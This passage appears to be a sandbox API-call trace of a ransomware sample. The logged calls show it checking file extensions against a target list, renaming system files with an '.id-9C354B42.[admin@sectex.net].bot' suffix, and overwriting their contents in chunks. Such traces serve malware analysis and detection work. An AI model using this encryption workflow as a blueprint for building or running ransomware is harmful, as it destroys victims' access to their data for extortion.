	[0053.923] lstrcmpiW (lpString1=".7z", lpString2="FNT") returned -1
	[0053.923] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67
	[0053.923] lstrlenW (lpString=".dbf") returned 4
	[0053.923] lstrcmpiW (lpString1=".dbf", lpString2=".FNT") returned -1
	[0053.923] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67
	[0053.923] lstrlenW (lpString=".1cd") returned 4
	[0053.923] lstrcmpiW (lpString1=".1cd", lpString2=".FNT") returned -1
	[0053.923] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67
	[0053.923] lstrlenW (lpString=".jpg") returned 4
	[0053.923] lstrcmpiW (lpString1=".jpg", lpString2=".FNT") returned 1
	[0053.923] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67
	[0053.923] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67
	[0053.923] lstrlenW (lpString=".doc") returned 4
	[0053.923] lstrcmpiW (lpString1=".doc", lpString2=".FNT") returned -1
	[0053.923] lstrlenW (lpString=".docx") returned 5
	[0053.923] lstrcmpiW (lpString1=".docx", lpString2="2.FNT") returned -1
	[0053.923] lstrlenW (lpString=".pdf") returned 4
	[0053.923] lstrcmpiW (lpString1=".pdf", lpString2=".FNT") returned 1
	[0053.923] lstrlenW (lpString=".xls") returned 4
	[0053.923] lstrcmpiW (lpString1=".xls", lpString2=".FNT") returned 1
	[0053.923] lstrlenW (lpString=".xlsx") returned 5
	[0053.924] lstrcmpiW (lpString1=".xlsx", lpString2="2.FNT") returned -1
	[0053.924] lstrlenW (lpString=".ppt") returned 4
	[0053.924] lstrcmpiW (lpString1=".ppt", lpString2=".FNT") returned 1
	[0053.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67
	[0053.924] lstrlenW (lpString=".zip") returned 4
	[0053.924] lstrcmpiW (lpString1=".zip", lpString2=".FNT") returned 1
	[0053.924] lstrlenW (lpString=".rar") returned 4
	[0053.924] lstrcmpiW (lpString1=".rar", lpString2=".FNT") returned 1
	[0053.924] lstrlenW (lpString=".bz2") returned 4
	[0053.924] lstrcmpiW (lpString1=".bz2", lpString2=".FNT") returned -1
	[0053.924] lstrlenW (lpString=".7z") returned 3
	[0053.924] lstrcmpiW (lpString1=".7z", lpString2="FNT") returned -1
	[0053.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67
	[0053.924] lstrlenW (lpString=".dbf") returned 4
	[0053.924] lstrcmpiW (lpString1=".dbf", lpString2=".FNT") returned -1
	[0053.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67
	[0053.924] lstrlenW (lpString=".1cd") returned 4
	[0053.924] lstrcmpiW (lpString1=".1cd", lpString2=".FNT") returned -1
	[0053.924] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67
	[0053.924] lstrlenW (lpString=".jpg") returned 4
	[0053.924] lstrcmpiW (lpString1=".jpg", lpString2=".FNT") returned 1
	[0053.924] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0053.924] lstrlenW (lpString="ITIRCL55.DLL") returned 12
	[0053.924] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0054.906] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=1831424) returned 1
	[0054.906] CloseHandle (hObject=0x1a8) returned 1
	[0054.906] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll")) returned 0x20
	[0054.906] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0054.907] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0054.907] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0054.907] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0x0) returned 1
	[0054.908] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0054.908] ReadFile (in: hFile=0x1a8, lpBuffer=0xb0b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0b0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0054.911] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x950aa, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0054.911] ReadFile (in: hFile=0x1a8, lpBuffer=0xb0f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0f0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0054.914] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0054.914] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x17f200, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0054.914] ReadFile (in: hFile=0x1a8, lpBuffer=0xb130058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb130058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0054.931] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0054.931] WriteFile (in: hFile=0x1a8, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0xa55fcb0, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fcb0*=0xc0104, lpOverlapped=0x0) returned 1
	[0055.018] SetEndOfFile (hFile=0x1a8) returned 1
	[0055.288] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb452758
	[0055.327] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0055.328] WriteFile (in: hFile=0x1a8, lpBuffer=0xb452758*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb452758*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0055.343] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x950aa, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0055.343] WriteFile (in: hFile=0x1a8, lpBuffer=0xb452758*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb452758*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0055.345] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x17f200, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0055.345] WriteFile (in: hFile=0x1a8, lpBuffer=0xb452758*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb452758*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0055.347] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb452758 | out: hHeap=0x7d60000) returned 1
	[0055.347] CloseHandle (hObject=0x1a8) returned 1
	[0055.347] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0055.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64
	[0055.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64
	[0055.347] lstrlenW (lpString=".doc") returned 4
	[0055.348] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0055.348] lstrlenW (lpString=".docx") returned 5
	[0055.348] lstrcmpiW (lpString1=".docx", lpString2="5.DLL") returned -1
	[0055.348] lstrlenW (lpString=".pdf") returned 4
	[0055.348] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0055.348] lstrlenW (lpString=".xls") returned 4
	[0055.348] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0055.348] lstrlenW (lpString=".xlsx") returned 5
	[0055.348] lstrcmpiW (lpString1=".xlsx", lpString2="5.DLL") returned -1
	[0055.348] lstrlenW (lpString=".ppt") returned 4
	[0055.348] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0055.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64
	[0055.348] lstrlenW (lpString=".zip") returned 4
	[0055.348] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0055.348] lstrlenW (lpString=".rar") returned 4
	[0055.348] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0055.348] lstrlenW (lpString=".bz2") returned 4
	[0055.348] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0055.348] lstrlenW (lpString=".7z") returned 3
	[0055.348] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0055.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64
	[0055.348] lstrlenW (lpString=".dbf") returned 4
	[0055.348] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0055.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64
	[0055.348] lstrlenW (lpString=".1cd") returned 4
	[0055.348] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0055.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64
	[0055.348] lstrlenW (lpString=".jpg") returned 4
	[0055.348] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0055.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64
	[0055.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64
	[0055.348] lstrlenW (lpString=".doc") returned 4
	[0055.348] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0055.349] lstrlenW (lpString=".docx") returned 5
	[0055.349] lstrcmpiW (lpString1=".docx", lpString2="5.DLL") returned -1
	[0055.349] lstrlenW (lpString=".pdf") returned 4
	[0055.349] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0055.349] lstrlenW (lpString=".xls") returned 4
	[0055.349] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0055.349] lstrlenW (lpString=".xlsx") returned 5
	[0055.349] lstrcmpiW (lpString1=".xlsx", lpString2="5.DLL") returned -1
	[0055.349] lstrlenW (lpString=".ppt") returned 4
	[0055.349] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0055.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64
	[0055.349] lstrlenW (lpString=".zip") returned 4
	[0055.349] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0055.349] lstrlenW (lpString=".rar") returned 4
	[0055.349] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0055.349] lstrlenW (lpString=".bz2") returned 4
	[0055.349] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0055.349] lstrlenW (lpString=".7z") returned 3
	[0055.349] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0055.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64
	[0055.349] lstrlenW (lpString=".dbf") returned 4
	[0055.349] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0055.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64
	[0055.349] lstrlenW (lpString=".1cd") returned 4
	[0055.349] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0055.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64
	[0055.349] lstrlenW (lpString=".jpg") returned 4
	[0055.349] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0055.349] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0055.350] lstrlenW (lpString="mip.exe.mui") returned 11
	[0055.350] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0055.413] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=10240) returned 1
	[0055.413] CloseHandle (hObject=0x1cc) returned 1
	[0055.413] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui")) returned 0x20
	[0055.413] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0055.413] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0055.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68
	[0055.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68
	[0055.413] lstrlenW (lpString=".doc") returned 4
	[0055.413] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0055.413] lstrlenW (lpString=".docx") returned 5
	[0055.413] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0055.413] lstrlenW (lpString=".pdf") returned 4
	[0055.413] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0055.413] lstrlenW (lpString=".xls") returned 4
	[0055.413] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0055.413] lstrlenW (lpString=".xlsx") returned 5
	[0055.413] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0055.413] lstrlenW (lpString=".ppt") returned 4
	[0055.413] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0055.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68
	[0055.413] lstrlenW (lpString=".zip") returned 4
	[0055.413] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0055.413] lstrlenW (lpString=".rar") returned 4
	[0055.414] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0055.414] lstrlenW (lpString=".bz2") returned 4
	[0055.414] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0055.414] lstrlenW (lpString=".7z") returned 3
	[0055.414] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0055.414] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68
	[0055.414] lstrlenW (lpString=".dbf") returned 4
	[0055.414] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0055.414] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68
	[0055.414] lstrlenW (lpString=".1cd") returned 4
	[0055.414] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0055.414] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68
	[0055.414] lstrlenW (lpString=".jpg") returned 4
	[0055.414] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0055.414] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68
	[0055.414] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68
	[0055.414] lstrlenW (lpString=".doc") returned 4
	[0055.414] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0055.414] lstrlenW (lpString=".docx") returned 5
	[0055.414] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0055.414] lstrlenW (lpString=".pdf") returned 4
	[0055.414] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0055.414] lstrlenW (lpString=".xls") returned 4
	[0055.414] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0055.414] lstrlenW (lpString=".xlsx") returned 5
	[0055.414] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0055.414] lstrlenW (lpString=".ppt") returned 4
	[0055.414] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0055.414] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68
	[0055.414] lstrlenW (lpString=".zip") returned 4
	[0055.414] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0055.414] lstrlenW (lpString=".rar") returned 4
	[0055.414] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0055.414] lstrlenW (lpString=".bz2") returned 4
	[0055.415] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0055.415] lstrlenW (lpString=".7z") returned 3
	[0055.415] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0055.415] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68
	[0055.415] lstrlenW (lpString=".dbf") returned 4
	[0055.415] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0055.415] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68
	[0055.415] lstrlenW (lpString=".1cd") returned 4
	[0055.415] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0055.415] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68
	[0055.415] lstrlenW (lpString=".jpg") returned 4
	[0055.415] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0055.415] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0055.415] lstrlenW (lpString="mshwLatin.dll.mui") returned 17
	[0055.415] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0055.616] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=2560) returned 1
	[0055.616] CloseHandle (hObject=0x1a0) returned 1
	[0055.616] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui")) returned 0x20
	[0055.616] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0055.616] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0055.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74
	[0055.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74
	[0055.617] lstrlenW (lpString=".doc") returned 4
	[0055.617] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0055.617] lstrlenW (lpString=".docx") returned 5
	[0055.617] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1
	[0055.617] lstrlenW (lpString=".pdf") returned 4
	[0055.617] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0055.617] lstrlenW (lpString=".xls") returned 4
	[0055.617] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0055.617] lstrlenW (lpString=".xlsx") returned 5
	[0055.617] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1
	[0055.617] lstrlenW (lpString=".ppt") returned 4
	[0055.617] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0055.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74
	[0055.617] lstrlenW (lpString=".zip") returned 4
	[0055.617] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0055.617] lstrlenW (lpString=".rar") returned 4
	[0055.617] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0055.617] lstrlenW (lpString=".bz2") returned 4
	[0055.617] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0055.617] lstrlenW (lpString=".7z") returned 3
	[0055.617] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0055.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74
	[0055.617] lstrlenW (lpString=".dbf") returned 4
	[0055.617] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0055.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74
	[0055.617] lstrlenW (lpString=".1cd") returned 4
	[0055.617] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0055.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74
	[0055.617] lstrlenW (lpString=".jpg") returned 4
	[0055.617] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0055.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74
	[0055.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74
	[0055.618] lstrlenW (lpString=".doc") returned 4
	[0055.618] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0055.618] lstrlenW (lpString=".docx") returned 5
	[0055.618] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1
	[0055.618] lstrlenW (lpString=".pdf") returned 4
	[0055.618] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0055.618] lstrlenW (lpString=".xls") returned 4
	[0055.618] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0055.618] lstrlenW (lpString=".xlsx") returned 5
	[0055.618] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1
	[0055.618] lstrlenW (lpString=".ppt") returned 4
	[0055.618] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0055.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74
	[0055.618] lstrlenW (lpString=".zip") returned 4
	[0055.618] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0055.618] lstrlenW (lpString=".rar") returned 4
	[0055.618] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0055.618] lstrlenW (lpString=".bz2") returned 4
	[0055.618] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0055.618] lstrlenW (lpString=".7z") returned 3
	[0055.618] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0055.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74
	[0055.618] lstrlenW (lpString=".dbf") returned 4
	[0055.618] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0055.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74
	[0055.618] lstrlenW (lpString=".1cd") returned 4
	[0055.618] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0055.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74
	[0055.618] lstrlenW (lpString=".jpg") returned 4
	[0055.618] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0055.619] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0055.619] lstrlenW (lpString="ALRTINTL.DLL") returned 12
	[0055.619] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0055.619] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=154448) returned 1
	[0055.619] CloseHandle (hObject=0x1a0) returned 1
